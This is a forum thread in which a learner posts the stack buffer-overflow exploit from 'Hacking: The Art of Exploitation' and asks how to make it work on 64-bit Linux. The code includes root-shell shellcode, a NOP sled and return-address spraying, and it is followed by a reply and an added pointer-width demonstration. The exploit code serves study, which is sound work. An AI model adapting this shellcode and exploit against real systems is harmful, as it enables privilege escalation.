art of exploitation example help

Hello all,
I am starting with the book "Hacking: The Art of Exploitation" and in the first example, vuln.c, there is a simple overflow attack (see below). However, it does not work on my 64-bit Ubuntu, and I get that this is from 2003 and things have changed. Is there a modification that can be done to this code to get it to work? I read something about using the existing *argv pointer, but there was no explanation. Thank you for any help.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

/* The book's 32-bit trick: copy %esp into %eax, the integer return register.
   There is no return statement, so this relies on compiler behaviour. */
unsigned long sp(void) {__asm__("movl %esp, %eax");}

int main(int argc, char *argv[]) {

    int i, offset;
    long esp, ret, *addr_ptr;
    char *buffer, *ptr;

    offset = 0;
    esp = sp();
    ret = esp - offset;

    printf("Stack pointer (ESP) : 0x%lx\n", esp);
    printf("  Offset from ESP : 0x%x\n", offset);
    printf("Desired return Addr : 0x%lx\n", ret);

    buffer = malloc(600);

    ptr = buffer;
    addr_ptr = (long*)ptr;

    /* Fill the whole buffer with the return address, one long per step.
       The book steps by the size of a long; stepping by 1 as posted would
       write 600 longs and run far past the end of the 600-byte buffer. */
    for(i=0; i < 600; i += sizeof(long))
    {*(addr_ptr++) = ret; }

    /* NOP sled in the first 200 bytes */
    for(i=0;i<200;++i)
    {buffer[i] = '\x90';}

    /* shellcode right after the sled */
    ptr = buffer + 200;
    for(i=0;i<strlen(shellcode);++i)
    {*(ptr++) = shellcode[i];}

    buffer[600-1] = 0;

    execl("./vuln", "vuln", buffer, (char *)NULL);

    free(buffer);
}
closed account (Dy7SLyTq)
I don't have a lot of time to look at it because I'm busy, but my guess would be you need to double what you are using to overflow.
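To illustrate the point about doubling, here is an added demonstration that is not from the book or either poster: on 64-bit Linux a saved return address is 8 bytes, so filling the buffer with 4-byte copies of an address, as the 2003 code does with its 4-byte long, never lines up to a single intact pointer. The address value and buffer are constructed for the example, which assumes a little-endian x86 build.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN 600     /* same buffer size as the book's exploit */

/* Constructed sample address, not a real one; masked so the example also
 * builds on a 32-bit target, where it simply truncates to 32 bits. */
#define FAKE_RET ((uintptr_t)(0x7ffdcafe1234ULL & UINTPTR_MAX))

/* Place a copy of addr every `width` bytes, storing only its low `width`
 * bytes (little-endian). width == 4 is what the 2003 code does, because a
 * long was 4 bytes on 32-bit Linux. */
static void fill_with_addr(unsigned char *buf, size_t len,
                           uintptr_t addr, size_t width)
{
    for (size_t i = 0; i + width <= len; i += width)
        memcpy(buf + i, &addr, width);
}

/* Read the buffer back the way the CPU would load a saved return address:
 * one pointer-sized word at a time. Returns how many of them equal addr. */
static size_t count_intact_words(const unsigned char *buf, size_t len,
                                 uintptr_t addr)
{
    size_t n = 0;
    for (size_t i = 0; i + sizeof(uintptr_t) <= len; i += sizeof(uintptr_t)) {
        uintptr_t w;
        memcpy(&w, buf + i, sizeof w);
        if (w == addr)
            n++;
    }
    return n;
}

/* Build the 600-byte buffer with the given address width and report how
 * many usable pointer-sized copies of FAKE_RET it ends up containing. */
size_t usable_addresses(size_t width)
{
    unsigned char buf[BUF_LEN];
    memset(buf, 0x90, sizeof buf);
    fill_with_addr(buf, sizeof buf, FAKE_RET, width);
    return count_intact_words(buf, sizeof buf, FAKE_RET);
}

int main(void)
{
    printf("pointer size on this build: %zu bytes\n", sizeof(uintptr_t));
    printf("4-byte stride (book):  %zu usable copies\n", usable_addresses(4));
    printf("pointer-size stride:   %zu usable copies\n",
           usable_addresses(sizeof(uintptr_t)));
    return 0;
}
```

On a 64-bit build the 4-byte stride yields 0 usable copies and the pointer-size stride yields 75; on a 32-bit build both yield 150, which is why the book's code worked as written in 2003.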